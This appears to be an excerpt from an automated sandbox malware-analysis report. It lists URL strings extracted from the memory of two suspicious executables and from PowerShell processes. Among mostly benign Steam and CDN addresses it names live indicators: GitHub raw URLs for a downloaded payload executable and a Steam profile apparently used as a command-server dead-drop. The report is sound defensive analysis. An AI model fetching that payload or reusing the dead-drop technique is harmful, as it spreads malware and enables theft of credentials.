Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&
Source: powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com
Source: powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: YYjRtxS70h.exe	String found in binary or memory: https://github.com/olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: powershell.exe, 00000005.00000002.1558683585.0000000006089000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1606744691.00000000061B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.c
Source: 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://steamcommunity.com/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2523079878.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/O
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158701054.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/P
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199804377619
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/o
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000000.1785190377.000000000045C000.00000008.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837734458.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619#
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837734458.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619/badges
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619/inventory/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619?
